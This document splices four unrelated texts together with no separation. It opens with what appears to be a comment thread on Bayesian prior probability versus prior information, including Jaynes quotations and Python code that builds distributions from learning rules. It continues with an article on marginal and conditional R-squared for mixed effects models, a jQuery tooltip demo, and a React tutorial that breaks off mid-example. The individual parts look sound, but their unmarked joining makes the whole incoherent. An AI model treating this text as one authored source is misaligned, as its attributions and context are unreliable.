You are being a bad boy. In his earlier discussion Eliezer made it clear that he did not approve of this terminology of "updating priors." One has posterior probability distributions. The prior is what one starts with. However, Eliezer has also been a bit confusing with his occasional use of such language as a "prior learning." I repeat, agents learn, not priors, although in his view of the post-human computerized future, maybe it will be computerized priors that do the learning.
The only way one is going to get "wrong learning" at least somewhat asymptotically is if the dimensionality is high and the support is disconnected. Eliezer is right that if one starts off with a prior that is far enough off, one might well have "wrong learning," at least for a while. But, unless the conditions I just listed hold, eventually the learning will move in the right direction and head towards the correct answer, or probability distribution; at least, that is what Bayes' Theorem asserts.
OTOH, the reference to "deep Bayesianism" raises another issue, that of fundamental subjectivism. There is this deep divide among Bayesians between the ones that are ultimately classical frequentists but who argue that Bayesian methods are a superior way of getting to the true objective distribution, and the deep subjectivist Bayesians. For the latter, there are no ultimately "true" probability distributions. We are always estimating something derived out of our subjective priors as updated by more recent information, wherever those priors came from.
Also, saying a prior should be the known probability distribution, say of cancer victims, assumes that this probability is somehow known. The prior is always subject to how much information the assumer of a prior has when they begin their process of estimation.
Eliezer may not approve of it, but almost all of the literature uses the phrase "updating a prior" to mean exactly the type of sequential learning from evidence that Eliezer discusses. I prefer to think of it as 'updating a prior'. Bayes' theorem tells you that data is an operator on the space of probability distributions, converting prior information into posterior information. I think it's helpful to think of that process as 'updating' so that my prior actually changes to something new before the next piece of information comes my way.
Eliezer,
Just to be clear . . . going back to your first paragraph, that 0.5 is a prior probability for the outcome of one draw from the urn (that is, for the random variable that equals 1 if the ball is red and 0 if the ball is white). But, as you point out, 0.5 is not a prior probability for the series of ten draws. What you're calling a "prior" would typically be called a "model" by statisticians. Bayesians traditionally divide a model into likelihood, prior, and hyperprior, but as you implicitly point out, the dividing line between these is not clear: ultimately, they're all part of the big model.
Barkley, I think you may be regarding likelihood distributions as fixed properties held in common by all agents, whereas I am regarding them as variables folded into the prior - if you have a probability distribution over sequences of observables, it implicitly includes beliefs about parameters and likelihoods. Where agents disagree about prior likelihood functions, not just prior parameter probabilities, their beliefs may trivially fail to converge.
Andrew's point may be particularly relevant here - it may indeed be that statisticians call what I am talking about a "model". (Although in some cases, like the Laplace's Law of Succession inductor, I think they might call it a "model class"?) Jaynes, however, would have called it our "prior information" and he would have written "the probability of A, given that we observe B" as p(A|B,I) where I stands for all our prior beliefs including parameter distributions and likelihood distributions. While we may often want to discriminate between different models and model classes, it makes no sense to talk about discriminating between "prior informations" - your prior information is everything you start out with.
Eliezer, I am very interested in the Bayesian approach to reasoning you've outlined on this site, it's one of the more elegant ideas I've ever run into.
I am a bit confused, though, about to what extent you are using math directly when assessing truth claims. If I asked you for example "what probability do you assign to the proposition 'global warming is anthropogenic' ?" (say), would you tell me a number?
Or is this mostly about conceptually understanding that P(effect|~cause) needs to be taken into account?
If it's a number, what's your heuristic for getting there (i.e., deciding on a prior probability & all the other probabilities)?
If there's a post that goes into that much detail, I haven't seen it yet, though your explanations of Bayes theorem generally are brilliant.
My reason for writing this is not to correct Eliezer. Rather, I want to expand on his distinction between prior information and prior probability. Pages 87-89 of Probability Theory: the Logic of Science by E. T. Jaynes (2004 reprint with corrections, ISBN 0 521 59271 2) are dense with important definitions and principles. The quotes below are from there, unless otherwise indicated.
Jaynes writes the fundamental law of inference as
P(H|DX) = P(H|X) P(D|HX) / P(D|X) (4.3)
Which the reader may be more used to seeing as
P(H|D) = P(H) P(D|H) / P(D)
Where
H = some hypothesis to be tested
D = the data under immediate consideration
X = all other information known
X is the misleadingly-named ‘prior information’, which represents all the information available other than the specific data D that we are considering at the moment. “This includes, at the very least, all its past experiences, from the time it left the factory to the time it received its current problem.” --Jaynes p.87, referring to a hypothetical problem-solving robot. It seems to me that in practice, X ends up being a representation of a subset of all prior experience, attempting to discard only what is irrelevant to the problem. In real human practice, that representation may be wrong and may need to be corrected.
“ ... to our robot, there is no such thing as an ‘absolute’ probability; all probabilities are necessarily conditional on X at the least.” “Any probability P(A|X) which is conditional on X alone is called a prior probability. But we caution that ‘prior’ ... does not necessarily mean ‘earlier in time’ ... the distinction is purely a logical one; any information beyond the immediate data D of the current problem is by definition ‘prior information’.”
“Indeed, the separation of the totality of the evidence into two components called ‘data’ and ‘prior information’ is an arbitrary choice made by us, only for our convenience in organizing a chain of inferences.” Please note his use of the word ‘evidence’.
Sampling theory, which is the basis of many treatments of probability, “ ... did not need to take any particular note of the prior information X, because all probabilities were conditional on H, and so we could suppose implicitly that the general verbal prior information defining the problem was included in H. This is the habit of notation that we have slipped into, which has obscured the unified nature of all inference.”
“From the start, it has seemed clear how one determines numerical values of sampling probabilities¹ [e.g. P(D|H) ], but not what determines prior probabilities [AKA ‘priors’ e.g. P(H|X)]. In the present work we shall see that this is only an artifact of the unsymmetrical way of formulating problems, which left them ill-posed. One could see clearly how to assign sampling probabilities because the hypothesis H was stated very specifically; had the prior information X been specified equally well, it would have been equally clear how to assign prior probabilities.”
Jaynes never gives up on that X notation (though the letter may differ); he never drops it for convenience.
“When we look at these problems on a sufficiently fundamental level and realize how careful one must be to specify prior information before we have a well-posed problem, it becomes clear that ... exactly the same principles are needed to assign either sampling probabilities or prior probabilities ...” That is, P(H|X) should be calculated. Keep your copy of Kendall and Stuart handy.
I think priors should not be cheaply set from an opinion, whim, or wish. “ ... it would be a big mistake to think of X as standing for some hidden major premise, or some universally valid proposition about Nature.”
The prior information has impact beyond setting prior probabilities (priors). It informs the formulation of the hypotheses, of the model, and of “alternative hypotheses” that come to mind when the data seem to be showing something really strange. For example, data that seems to strongly support psychokinesis may cause a skeptic to bring up a hypothesis of fraud, whereas a career psychic researcher may not do so. (see Jaynes pp.122-125)
I say, be alert for misinformation, biases, and wishful thinking in your X. Discard everything that is not evidence.
I’m pretty sure the free version of Probability Theory: The Logic of Science is offline. You can preview the book here: http://books.google.com/books?id=tTN4HuUNXjgC&printsec=frontcover&dq=Probability+Theory:+The+Logic+of+Science&cd=1#v=onepage&q&f=false .
Also see the Unofficial Errata and Commentary for E. T. Jaynes’s Probability Theory: The Logic of Science
SEE ALSO
FOOTNOTES
1. There are massive compendiums of methods for sampling distributions, such as Feller (An Introduction to Probability Theory and its Applications, Vol. 1, J. Wiley & Sons, New York, 3rd edn 1968, and Vol. 2, J. Wiley & Sons, New York, 2nd edn 1971) and Kendall and Stuart (The Advanced Theory of Statistics: Volume 1, Distribution Theory, McMillan, New York 1977). Be familiar with what is in them.
Edited 05/05/2010 to put in the actual references.
Edited 05/19/2010 to put in SEE ALSO
Then the task is just to turn this new distribution into a computer program, which turns out not to be difficult.
Can someone please provide a hint how?
Here's some Python code to calculate a prior distribution from a rule for assigning probability to the next observation.
A "rule" is represented as a function that takes as a first argument the next observation (like "R") and as a second argument all previous observations (a string like "RRWR"). I included some example rules at the end.
EDIT: oh man, what happened to my line spacing? my indents? jeez.
EDIT2: here's a dropbox link: https://www.dropbox.com/s/16n01acrauf8h7g/prior_producer.py
from functools import reduce

def prod(sequence):
    '''Product equivalent of python's "sum".'''
    return reduce(lambda a, b: a * b, sequence)

def sequence_prob(rule, sequence):
    '''Probability of a sequence like "RRWR" using the given rule for
    computing the probability of the next observation.
    To put it another way: computes the joint probability mass function.'''
    return prod([rule(sequence[i], sequence[:i])
                 for i in range(len(sequence))])

def number2sequence(number, length):
    '''Convert a number like 5 into a sequence like WWRWR.
    The sequence corresponds to the binary digit representation of the
    number: 5 --> 00101 --> WWRWR
    This is convenient for listing all sequences of a given length.'''
    binary_representation = bin(number)[2:]
    seq_end = binary_representation.replace('1', 'R').replace('0', 'W')
    if len(seq_end) > length:
        raise ValueError('no sequence of length {} with number {}'
                         .format(length, number))
    # Now add W's to the beginning to make it the right length -
    # like adding 0's to the beginning of a binary number
    return ''.join('W' for i in range(length - len(seq_end))) + seq_end

def prior(rule, n):
    '''Generate a joint probability distribution from the given rule over
    all sequences of length n. Doesn't feed the rule any background
    knowledge, so it's a prior distribution.'''
    sequences = [number2sequence(i, n) for i in range(2**n)]
    return [(seq, sequence_prob(rule, seq)) for seq in sequences]
And here are some examples of functions that can be used as the "rule" arguments.
def laplaces_rule(next, past):
    R = past.count('R')
    W = past.count('W')
    if R + W != len(past):
        raise ValueError('knowledge is not just of red and white balls')
    red_prob = (R + 1) / (R + W + 2)
    if next == 'R':
        return red_prob
    elif next == 'W':
        return 1 - red_prob
    else:
        raise ValueError('can only predict whether next will be red or white')

def antilaplaces_rule(next, past):
    return 1 - laplaces_rule(next, past)
So just to be clear. There are two things: the prior probability, which is the value P(H|I), and the background information, which is 'I'. So P(H|D,I_1) is different from P(H|D,I_2) because they are updates using the same data and the same hypothesis, but with different partial background information; they are both, however, posterior probabilities. And the priors P(H|I_1) may be equal to P(H|I_2) even if I_1 and I_2 are radically different and produce updates in opposite directions given the same data. P(H|I) is still called the prior probability, but it is something very different from the background information, which is essentially just I.
Is this right? Let me be more specific.
Let's say my prior information is case1; then P(second ball is R | first ball is R & case1) = 4/9.
If my prior information was case2, then P(second ball is R | first ball is R & case2) = 2/3 [by the rule of succession],
and P(first ball is R | case1) = 50% = P(first ball is R | case2).
This is why different prior information can make you learn in different directions, even if two prior informations produce the same prior probability?
Please let me know if i am making any sort of mistake. Or if I got it right, either way.
No really, I really want help. Please help me understand if I am confused, and settle my anxiety if I am not confused.
You got it right. The three different cases correspond to different joint distributions over sequences of outcomes. Prior information that one of the cases obtains amounts to picking one of these distributions (of course, one can also have weighted combinations of these distributions if there is uncertainty about which case obtains). It turns out that in this example, if you add together the probabilities of all the sequences that have a red ball in the second position, you will get 0.5 for each of the three distributions. So equal prior probabilities. But even though the terms sum to 0.5 in all three cases, the individual terms will not be the same. For instance, prior information of case 1 would assign a different probability to RRRRR (0.004) than prior information of case 2 (0.031).
So the prior information is a joint distribution over sequences of outcomes, while the prior probability of the hypothesis is (in this example at least) a marginal distribution calculated from this joint distribution. Since multiple joint distributions can give you the same marginal distribution for some random variable, different prior information can correspond to the same prior probability.
When you restrict attention to those sequences that have a red ball in the first position, and now add together the (appropriately renormalized) joint probabilities of sequences with a red ball in the second position, you don't get the same number with all three distributions. This corresponds to the fact that the three distributions are associated with different learning rules.
One can update one's beliefs about one's existing beliefs and the ways in which one learns from experience too – click.
Under standard assumptions about the drawing process, you only need 10 numbers, not 1024: P(the urn initially contained ten white balls), P(the urn initially contained nine white balls and one red one), P(the urn initially contained eight white balls and two red ones), and so on through P(one white ball and nine red ones). (P(ten red balls) equals 1 minus everything else.) P(RWRWWRWRWW) is then P(4R, 6W) divided by the appropriate binomial coefficient.
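(Concretely: there are C(10,4) = 210 sequences containing exactly four reds, so under this assumption each specific ordering - RWRWWRWRWW included - gets probability P(4R, 6W)/210.)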
So then this initial probability estimate, 0.5, is not repeat not a "prior".
This really confuses me. Considering the Universe in your example, which consists only of the urn with the balls, wouldn't one of the prior hypotheses (e.g. case 2) be a prior and have all the necessary information to compute the lookup table?
In other words aren't the three following equivalent in the urn-with-balls universe?
1. Hypothesis 2 + bayesian updating
2. Python program 2
3. The lookup table generated from program 2 + Procedure for calculating conditional probability (e.g. if you want to know the probability that the third ball is red, given that the first two balls drawn were white.)
Unless I am misunderstanding you, yes, that's precisely the point.
I don't understand why you are confused, though. None of these are, after all, numbers in (0,1), which would not contain any information as to how you would go about doing your updates given more evidence.
R-Squared for Mixed Effects Models
by guest
By Kim Love
When learning about linear models —that is, regression, ANOVA, and similar techniques—we are taught to calculate an R2. The R2 has the following useful properties:
• The range is limited to [0,1], so we can easily judge how relatively large it is.
• It is standardized, meaning its value does not depend on the scale of the variables involved in the analysis.
• The interpretation is pretty clear: It is the proportion of variability in the outcome that can be explained by the independent variables in the model.
The calculation of the R2 is also intuitive, once you understand the concepts of variance and prediction. One way to write the formula for R2 from a GLM is

R^2 = \frac{\sum_i (\hat{y}_i - \bar{y})^2}{\sum_i (y_i - \bar{y})^2}

where y_i is an actual individual outcome, \hat{y}_i is the model-predicted outcome that goes with it, and \bar{y} is the average of all the outcomes.
In this formula, the denominator measures all of the variability in y without considering the model. Each (\hat{y}_i - \bar{y}) term in the numerator represents how much closer the model’s predicted value gets us to the actual outcome than the mean does. Therefore, the fraction is the proportion of all of the variability in the outcome that is explained by the model.
The key to the neatness of this formula is that there are only two sources of variability in a linear model: the fixed effects (“explainable”) and the rest of it, which we often call error (“unexplainable”).
When we try to move to more complicated models, however, defining and agreeing on an R2 becomes more difficult. That is especially true with mixed effects models, where there is more than one source of variability (one or more random effects, plus residuals).
These issues, and a solution that many analysts now refer to, are presented in the 2012 article A general and simple method for obtaining R2 from generalized linear mixed‐effects models by Nakagawa and Schielzeth (see https://besjournals.onlinelibrary.wiley.com/doi/full/10.1111/j.2041-210x.2012.00261.x). These authors present two different options for calculating a mixed-effects R2, which they call the “marginal” and “conditional” R2.
Before describing these formulas, let’s borrow an example study from the Analysis Factor’s workshop “Introduction to Generalized Linear Mixed Models.” Suppose we are trying to predict the weight of a chick, based on its diet and number of days since hatching. Each chick in the data was weighed on multiple days, producing multiple outcomes for a single chick.
This analysis needs to account for the following sources of variability: the “fixed” effects of diet and time, the differences across the chicks (which we would call “random” because the chicks are randomly selected), and the prediction errors that occur when we try to use the model to predict a chick’s exact weight based on its diet and days since hatching.
The marginal R2 for LMMs described by Nakagawa and Schielzeth is calculated by

R^2_{marginal} = \frac{\sigma^2_f}{\sigma^2_f + \sigma^2_\alpha + \sigma^2_\varepsilon}

where \sigma^2_f is the variance of the fixed effects, \sigma^2_\alpha is the variance of the random effect, and \sigma^2_\varepsilon is the variance of the model residuals. In the context of the chick example, \sigma^2_f is the variability explained by diet and days since hatching, \sigma^2_\alpha is the variance attributed to differences across chicks, and \sigma^2_\varepsilon is the variability of the errors in individual weight predictions. Together, these three sources of variability add up to the total variability (the denominator of the marginal R2 equation). Dividing the variance of the fixed effects alone by this total variability provides us with a measure of the proportion of variability explained by the fixed effects.
However, this leads to a question: is the fixed effects part of the model the only part that is “explained”? Or is the variation across the chicks, which we have been calling “random,” now also “explained”? For those who would claim that random variability is explained, because it has been separated from residual variability, we calculate the conditional R2 for LMMs:

R^2_{conditional} = \frac{\sigma^2_f + \sigma^2_\alpha}{\sigma^2_f + \sigma^2_\alpha + \sigma^2_\varepsilon}

The conditional R2 is the proportion of total variance explained through both fixed and random effects.
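As a quick worked illustration (these numbers are made up for the arithmetic only, not taken from the chick data): if a fitted model gave \sigma^2_f = 600, \sigma^2_\alpha = 150, and \sigma^2_\varepsilon = 250, the total variability would be 1000, so the marginal R2 would be 600/1000 = 0.60 and the conditional R2 would be (600 + 150)/1000 = 0.75. The difference, 0.15, is exactly the share of the variance attributed to chick-to-chick differences.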
The article by Nakagawa and Schielzeth goes on to expand these formulas to situations with more than one random effect, and also to the generalized linear mixed effects model (GLMM).
The GLMM versions should be interpreted with the same caution we use with a pseudo R2 from a more basic generalized linear model. Concepts like “residual variability” do not have the same meaning in GLMMs. The article also discusses the advantages and limitations of each of these formulas, and compares their usefulness to other earlier versions of mixed effects R2 calculations.
Note that these versions of R2 are becoming more common, but are not entirely agreed upon or standard. You will not be able to calculate them directly in standard software. Instead, you need to calculate the components and program the calculation. Importantly, if you choose to report one or both of them, you should not only identify which one you are using, but provide some brief interpretation and a citation of the article.
HTML
<h1><span>Bubble Point</span> Tooltips</h1>
<p>Pellentesque habitant morbi tristique <a href="#" title="I ❤ ">senectus</a> et netus et malesuada fames ac <a href="#" title="Hi, I'm a tooltip thingy.">turpis</a> egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat <a href="#" title="Ooooh<br>Look at me<br>I'm a fancy tooltip">eleifend</a> leo.</p>
CSS
.tooltip,
.arrow:after {
background: black;
border: 2px solid white;
}
.tooltip {
pointer-events: none;
opacity: 0;
display: inline-block;
position: absolute;
padding: 10px 20px;
color: white;
border-radius: 20px;
margin-top: 20px;
text-align: center;
font: bold 14px "Helvetica Neue", Sans-Serif;
font-stretch: condensed;
text-decoration: none;
text-transform: uppercase;
box-shadow: 0 0 7px black;
}
.arrow {
width: 70px;
height: 16px;
overflow: hidden;
position: absolute;
left: 50%;
margin-left: -35px;
bottom: -16px;
}
.arrow:after {
content: "";
position: absolute;
left: 20px;
top: -20px;
width: 25px;
height: 25px;
box-shadow: 6px 5px 9px -9px black, 5px 6px 9px -9px black;
transform: rotate(45deg);
}
.tooltip.active {
opacity: 1;
margin-top: 5px;
transition: all 0.2s ease;
}
.tooltip.out {
opacity: 0;
margin-top: -20px;
}
h1 {
font-size: 32px;
font-family: "Helvetica Neue", Sans-Serif;
font-stretch: condensed;
text-transform: uppercase;
}
h1 span {
display: inline-block;
padding: 10px 20px;
background: black;
border: 2px solid white;
color: white;
border-radius: 20px;
margin-top: 20px;
text-align: center;
text-decoration: none;
box-shadow: 0 0 7px black;
}
body {
padding: 30px;
background: #bada55;
}
JS
// IIFE to ensure safe use of $
(function( $ ) {
// Create plugin
$.fn.tooltips = function(el) {
var $tooltip,
$body = $('body'),
$el;
// Ensure chaining works
return this.each(function(i, el) {
$el = $(el).attr("data-tooltip", i);
// Make DIV and append to page
var $tooltip = $('<div class="tooltip" data-tooltip="' + i + '">' + $el.attr('title') + '<div class="arrow"></div></div>').appendTo("body");
// Position right away, so first appearance is smooth
var linkPosition = $el.position();
$tooltip.css({
top: linkPosition.top - $tooltip.outerHeight() - 13,
left: linkPosition.left - ($tooltip.width()/2)
});
$el
// Get rid of yellow box popup
.removeAttr("title")
// Mouseenter
.hover(function() {
$el = $(this);
$tooltip = $('div[data-tooltip=' + $el.data('tooltip') + ']');
// Reposition tooltip, in case of page movement e.g. screen resize
var linkPosition = $el.position();
$tooltip.css({
top: linkPosition.top - $tooltip.outerHeight() - 13,
left: linkPosition.left - ($tooltip.width()/2)
});
// Adding class handles animation through CSS
$tooltip.addClass("active");
// Mouseleave
}, function() {
$el = $(this);
// Temporary class for same-direction fadeout
$tooltip = $('div[data-tooltip=' + $el.data('tooltip') + ']').addClass("out");
// Remove all classes
setTimeout(function() {
$tooltip.removeClass("active").removeClass("out");
}, 300);
});
});
}
})(jQuery);
$("a[title]").tooltips();
Minimal React: getting started with the frontend library
[2020-08-25] dev, javascript, frontend, react
This blog post explains how to get started with React while using as few libraries as possible.
Required knowledge
Things you should know before reading this blog post:
• JavaScript: You should have already written code in that language.
• Browser DOM (document object model): It helps if you are loosely familiar with how the DOM represents HTML and how it handles events.
• npm: It also helps if you have a basic understanding of the npm package manager for Node.js.
About this blog post
Many tutorials provide comprehensive introductions to the React ecosystem. I wanted to try something different:
What is the smallest set of libraries that allows you to be productive in React?
This is an exhaustive list of the npm packages that the code in this blog post depends on: react and react-dom (the library itself), htm (JSX-like syntax via tagged templates), and immer (non-destructive updating of data). At development time, snowpack and @snowpack/plugin-react-refresh are added (see the package.json quoted below).
The repository
The repository minimal-react contains the examples that we are exploring in this blog post:
• You can try out the examples online.
• You can install it locally to play with the complete setup. Everything is installed inside a single directory, so it’s easy to remove later on.
• However, installing the repository is not required for following this blog post. All relevant data is quoted inside the post.
The repository has the following structure:
• minimal-react/
• html/: HTML files
• js/: JavaScript code
• README.md: Instructions for installing and running the project
• package.json: Configuring the npm package manager
• snowpack.config.json: Configuring the Snowpack build tool
package.json specifies the npm packages that the JavaScript code depends on:
"devDependencies": {
"@snowpack/plugin-react-refresh": "^2.1.0",
"snowpack": "^2.9.0"
},
"dependencies": {
"htm": "^3.0.4",
"immer": "^7.0.7",
"react": "^16.13.1",
"react-dom": "^16.13.1"
}
package.json also defines two scripts:
"scripts": {
"start": "snowpack dev",
"build": "snowpack build"
},
These are executed via:
• Starting the development web server: npm run start
• Abbreviated: npm start
• Creating a standalone application (that runs without the development server): npm run build
What is React?
React is a library for creating user interfaces in web browsers. Before we take a look at how it works, let us remind ourselves how user interfaces are created if they are based on a traditional model-view-controller approach.
The traditional model-view-controller (MVC) approach
This object-oriented approach gets its name from three roles that objects play in it:
• The model is the data to be accessed via the graphical user interface.
• The view displays the model.
• The controller reacts to events (actions by the user) and updates model and view accordingly.
Traditional MVC-based user interfaces work as follows:
• A tree of user interface components is created once.
• Each user interface component manages its own state and updates it incrementally, in response to user interactions.
• “Glue code” that is external to the user interface components, propagates state changes between them.
This approach has downsides:
• The user interface logic is often scattered across the code.
• Cross-component changes are difficult to implement.
• It’s easy to introduce inconsistencies because there can be many different combinations of states.
React
React works differently:
• The user interface is encoded as a tree-shaped data structure. It is called virtual DOM, due to its similarity with the document object model (DOM) used by browsers to represent HTML.
• There is a single (nested) model for the complete user interface.
• A user interface component is simply a function that maps a model to a user interface.
• The root component has as input the whole model and passes on parts of that model to subcomponents (which are also functions).
• When the user interacts with the user interface, the model is changed accordingly and the complete user interface is recreated (by invoking the root component again).
• To make this viable, performance-wise, React compares the virtual DOM returned by the root component with the current browser DOM. It only changes the latter where the former differs.
Benefits of this approach:
• It’s easier to understand the user interface logic.
• Cross-component dependencies are easier to implement.
• The data flow is simpler: always from the top of the user interface component tree to its bottom.
First example: counting clicks
The first example is in the file minimal-react/html/counting-clicks.html.
Adding the user interface to the HTML page
This is the body of the HTML page:
<h1>Counting clicks</h1>
<div id="root"></div>
<script type="module" src="../js/counting-clicks.js"></script>
This is how minimal-react/js/counting-clicks.js adds its user interface to the web page:
import ReactDOM from 'react-dom';
import {html} from 'htm/react';
import {useState} from 'react';
// ···
ReactDOM.render(
html`<${CountingClicks} rootModel=${rootModel} />`, // (A)
document.getElementById('root')); // (B)
• Line A is how we create user interface elements (via the virtual DOM). Read on for more information.
• Line B is the HTML element in which React creates the user interface.
Creating user interface elements
Consider the following syntax from the previous example:
html`<${CountingClicks} rootModel=${rootModel} />`
There are two layers to this syntax.
Syntactic layer 1: tagged templates
html`···` is a tagged template. Tagged templates are a JavaScript language feature that lets us embed foreign syntax in JavaScript code. Each tagged template is actually a function call – for example:
const numberOfFruits = 4;
const nameOfFruits = 'strawberries';
const result = someFunc`I have ${numberOfFruits} ${nameOfFruits}!`;
The last line is equivalent to:
const result = someFunc(['I have ', ' ', '!'], numberOfFruits, nameOfFruits);
Tag functions such as someFunc() can return arbitrary values and are usually guided by their input. In this case, the input is:
• The template strings ['I have ', ' ', '!'] are static (the same each time this particular function call is made)
• The substitutions numberOfFruits and nameOfFruits are dynamic (possibly different each time this particular function call is made)
Substitutions are inserted “into” the template via the syntax ${···}.
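To make the mechanism concrete, here is a sketch of one possible tag function (the string-joining behavior is just for illustration; it is not what the html tag does - html parses its input):
function someFunc(templateStrings, ...substitutions) {
  // Reassemble static parts and substitutions in alternating order:
  // templateStrings[0], substitutions[0], templateStrings[1], ...
  let result = templateStrings[0];
  for (let i = 0; i < substitutions.length; i++) {
    result += substitutions[i] + templateStrings[i + 1];
  }
  return result;
}
With the earlier example, someFunc`I have ${numberOfFruits} ${nameOfFruits}!` evaluates to 'I have 4 strawberries!'.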
The tag function html supports React’s syntax for creating virtual DOM elements. It parses its input to produce its output.
Syntactic layer 2: JSX, React’s syntax for creating virtual DOM elements
JSX is a non-standard JavaScript language feature introduced by React. It lets us use HTML-ish expressions to create virtual DOM data. JSX must be compiled to standard JavaScript and is supported by several compilers – for example:
• Babel:
• Input: modern and/or future JavaScript
• Output: current or older JavaScript
• TypeScript:
• Input: JavaScript plus static type information (roughly, a superset of JavaScript)
• Output: current or older JavaScript
In this tutorial, we use a tagged template instead of JSX, which has the benefit that we can use plain JavaScript (no compilation is necessary). There are only minor differences between html syntax and JSX, which is why I’ll occasionally use the name JSX for the former.
There are two kinds of elements.
React components
First, the name of an element can be a function whose name starts with an uppercase letter:
html`<${UiComponent} arg1="abc" arg2=${123} />`
This expression is equivalent to:
React.createElement(UiComponent, { arg1: "abc", arg2: 123 })
In this case, React.createElement() makes the following function call:
UiComponent({ arg1: "abc", arg2: 123 })
Virtual DOM elements
Second, the name of an element can also be a string that starts with a lowercase letter:
html`<div arg1="abc" arg2=${123} />`
This expression is equivalent to:
React.createElement("div", { arg1: "abc", arg2: 123 })
In this case, React.createElement() directly creates virtual DOM data.
JSX in action
Let’s go back to the initial code:
html`<${CountingClicks} rootModel=${rootModel} />`
What is happening here?
We are invoking the component CountingClicks (a function) and passing it a single parameter, whose label is rootModel. This is what the root model looks like:
const rootModel = {
numberOfClicks: 0,
};
The component CountingClicks()
The component is implemented as follows:
function CountingClicks({rootModel: initialRootModel}) {
const [rootModel, setRootModel] = useState(initialRootModel); // (A)
return html`
<div>
<a href="" onClick=${handleIncrement}>
Number of clicks: ${rootModel.numberOfClicks}</a>
<p />
<button onClick=${handleReset}>Reset</button>
</div>
`;
function handleIncrement(event) {
// ···
}
function handleReset(event) {
// ···
}
}
The component returns a single virtual DOM element, a <div>. We use the ${···} syntax to insert values into the returned data:
• The click event handler handleIncrement
• The number rootModel.numberOfClicks
• The click event handler handleReset
Handling state via the useState hook
The function call useState() in line A adds reactivity to our code:
• rootModel is the current model data (the M in MVC).
• initialRootModel is the initial value of rootModel.
• setRootModel can be used to change rootModel. Whenever we do that, React automatically reruns the CountingClicks component so that the user interface always reflects what’s in the model.
Never mind how exactly React does this! There is a ton of magic going on behind the scenes. Therefore, it is better to think of useState() as a language mechanism rather than as a function call. useState() and other similar functions are called hooks because they let us hook into React’s API.
Handling click events
Clicks on the <a> element are handled by the following function:
function handleIncrement(event) {
event.preventDefault(); // (A)
const nextRootModel = { // (B)
numberOfClicks: rootModel.numberOfClicks + 1,
};
setRootModel(nextRootModel); // (C)
}
If a user clicks on an <a> element that has the attribute href, then, by default, the browser goes to the location specified by the attribute. The method call in line A prevents that from happening.
In line B, we create a new root model. We don’t change the existing model, we create a modified copy of it. Non-destructively updating data is a best practice in React. It avoids several problems.
In line C, we use the setter created by the useState() hook to make nextRootModel the new root model. As mentioned before, setRootModel() will also recreate the complete user interface by invoking CountingClicks() again.
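Incidentally, if the root model had more properties than just .numberOfClicks, spread syntax would let us write line B so that it copies all of them while overriding a single one (for this small model, the result is the same as above):
const nextRootModel = {
  ...rootModel, // copy all existing properties
  numberOfClicks: rootModel.numberOfClicks + 1, // override one of them
};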
Clicks on the <button> are handled by the following function:
function handleReset(event) {
const nextRootModel = {
numberOfClicks: 0,
};
setRootModel(nextRootModel);
}
This time, we don’t need to prevent a default action. We again create a new root model and activate it via setRootModel().
Second example: expandable sections
The second example is in the file minimal-react/html/expandable-sections.html.
Entry point
This time, the entry point of the JavaScript code looks like this:
ReactDOM.render(
html`<${Sections} sections=${addUiProperties(sections)} />`,
document.getElementById('root'));
The initial root model is:
const sections = [
{
title: 'Introduction',
body: 'In this section, we are taking a first look at the ideas that are covered by this document.',
},
// ···
];
Function addUiProperties() adds a single user-interface-related property to the root model:
function addUiProperties(sections) {
return sections.map((section) => ({
...section,
expanded: false,
}));
}
We use spreading (...) to copy each element of the Array sections while adding the new property expanded. Once again, we are not modifying the original data, we are updating it non-destructively.
User interface component Sections()
This is the root user interface component of the current example:
function Sections({sections: initialSections}) {
const [sections, setSections] = useState(initialSections);
return sections.map((section, index) => html`
<!--(A)-->
<${Section} key=${index}
sections=${sections} setSections=${setSections}
section=${section} sectionIndex=${index} />
`);
}
We again use the useState() hook to manage the model.
This time, the component returns an Array of virtual DOM elements (that are created by the subcomponent Section()). Note the key attribute in line A. Whenever we use an Array as virtual DOM data, each of the elements must have a unique key. The idea is that React can more efficiently update the browser’s DOM if each Array element has a unique identity. For example, if we only rearrange the elements but don’t otherwise change them, then React only needs to rearrange browser DOM nodes.
User interface component Section()
This is the component for a single section:
function Section({sections, setSections, section, sectionIndex}) {
return html`
<div style=${{marginBottom: '1em'}}> <!--(A)-->
<h3>
<a href="" style=${{textDecoration: 'none'}} onClick=${handleClick.bind(undefined, sectionIndex)}> <!--(B)-->
${section.expanded ? '▼ ' : '▶︎ '} <!--(C)-->
${section.title}
</a>
</h3>
${
!section.expanded // (D)
? null
: html`
<div>
${section.body}
</div>
`
}
</div>
`;
function handleClick(sectionIndex, event) { // (E)
event.preventDefault();
setSections(expandExactlyOneSection(sections, sectionIndex));
}
}
Using CSS in React components
In line A, we are specifying CSS via an object literal:
• CSS property names such as margin-bottom are translated to JavaScript identifiers such as marginBottom.
• CSS property values are specified via strings.
React’s rules for whitespace
In line C, we are using ${···} to insert a string into the user interface. JSX handles whitespace differently from HTML: Whitespace between lines is completely ignored. That’s why there is a space after each triangle.
Why does JSX do that? We can see the benefit in line B: The opening <a> tag can be on its own line and no space is inserted between that tag and the text in the next line.
Conditional evaluation
In line D, we are evaluating a condition:
• If the condition is true, we don’t insert anything into the user interface (as indicated by the special value null).
• If the condition is false, we insert virtual DOM data into the user interface.
Handling clicks
In line E, we are dealing with clicks on the triangle:
• First, we prevent the browser’s default action.
• Next, we change the model of the root component via setSections() (which was passed to Section() via a parameter). That leads to the user interface being re-rendered.
Function expandExactlyOneSection() non-destructively updates sections so that only the section is expanded whose index is sectionIndex.
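The blog post does not show the implementation of expandExactlyOneSection(). A minimal sketch that is consistent with how it is used (my reconstruction, not the original code) could be:
function expandExactlyOneSection(sections, sectionIndex) {
  // Non-destructive update: copy every section, expanding only the one
  // at sectionIndex and collapsing all the others.
  return sections.map((section, index) => ({
    ...section,
    expanded: index === sectionIndex,
  }));
}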
Exercises
• Add numbers to the sections.
• Change the code so that more than one section can be open at the same time.
• You’ll need to change and rename expandExactlyOneSection().
Third example: quiz
The third example is in the file minimal-react/html/quiz.html.
The model
This is the data that encodes quiz entries. Each entry has a question and zero or more answers:
const entries = [
{
question: 'When was JavaScript created?',
answers: [
{text: '1984', correct: false},
{text: '1995', correct: true},
{text: '2001', correct: false},
],
},
// ···
];
Immer
This time, we use the library Immer to help us with non-destructively updating data. It works as follows:
import produce from 'immer';
const updatedData = produce(originalData, (draftData) => {
// Modify draftData destructively here...
});
